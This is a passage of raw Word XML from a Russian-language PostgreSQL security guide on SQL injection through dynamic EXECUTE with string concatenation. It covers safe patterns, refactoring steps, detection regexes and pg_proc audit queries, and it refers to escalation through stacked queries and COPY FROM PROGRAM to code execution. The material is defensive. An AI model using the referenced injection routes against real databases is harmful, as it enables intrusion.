          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... || ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + USING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841A2C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`||`-concat сам по себе не запрещён</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — он плохой только когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>используется без сопровождающих защитных функций</w:t>
      </w:r>
      <w:r>
        <w:t>. Allowed patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E6E15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate: || c quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A1E189" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM ' || quote_ident(tbl_name) || ' WHERE id = $1' USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525630AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95D92D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate: || с quote_literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B97102" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT count(*) FROM logs WHERE level = ' || quote_literal(lvl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F313583" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- (но USING предпочтительнее для plan-cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDECFFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DDD7E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Legitimate: || для static literal + dynamic identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AFAAC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'CREATE INDEX ON ' || quote_ident(tbl_name) || ' (created_at)';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22377E8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- DDL — нет USING для CREATE, только identifier через quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE63B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>с защитными вызовами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функционально как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, стилистически старее. Pattern допустим, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> рекомендуется как более читаемый и менее error-prone (одно forget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>-chain — уже уязвимость).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43B5A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Refactoring strategy для legacy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B8EAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Найти все функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... ||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc LIKE '%EXECUTE%||%'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD2445" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>2. Для каждой определить, какие параметры — identifier, какие — value, какие — DDL-fragment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C251F25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Identifier → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', x)</w:t>
      </w:r>
      <w:r>
        <w:t>. Value → USING. DDL-fragment → whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27288B23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>4. RAISE NOTICE / RAISE DEBUG → удалить или преобразовать в structured logging без full SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E7622" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6EDEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2E621" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE\s*[^']*'[^']*'\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat после EXECUTE-string без format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED36704" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\|\|\s*[a-z_]+\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметр посреди concat-chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23D501" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'''.*\|\|.*\|\|.*'''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — одинарные кавычки вокруг concat (value position без quote_literal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF44F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF52A52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc ~ 'EXECUTE\s.*\|\|'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc !~ '\\Wformat\\W'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — concat без format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6551ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc ~ '\|\|\s*[a-z_]+\s*\|\|.*''' AND prosrc !~ 'quote_literal'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — value-concat без quote_literal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04A52C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc LIKE '%RAISE NOTICE%executing%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — debug-leak в logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19416C0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t>: EXECUTE-вычисленные SQL с DROP/COPY TO PROGRAM/UNION в нетипичных contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA9A6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:t>: дополнительные statements внутри EXECUTE (стек-trace plpgsql) — необычно долгие планы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4662CC18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все версии PG с plpgsql (≥ 6.x). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operator существует во всех версиях SQL92+. Никакие фиксы — application/database-developer level antipattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C8AA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A05C59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — defines </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как правильный identifier-инструмент; 3.16.4 — что бывает без него.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B038BD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2 quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функциональный эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>-pattern (allowed когда правильно используется).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621871D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — правильный value-инструмент; 3.16.4 — value-concat-injection без USING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED47B41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>-injection эскалирует в полный RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18895C42" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant A основной канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A51C2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B и C основной механизм.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136E023" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant C финальный RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514166DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая reference по защитным функциям.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55144FC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07456C2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D539686" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «String Functions and Operators» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-string.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2518B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   2ndQuadrant blog: «Anti-pattern: Building queries via string concatenation» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF2A8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
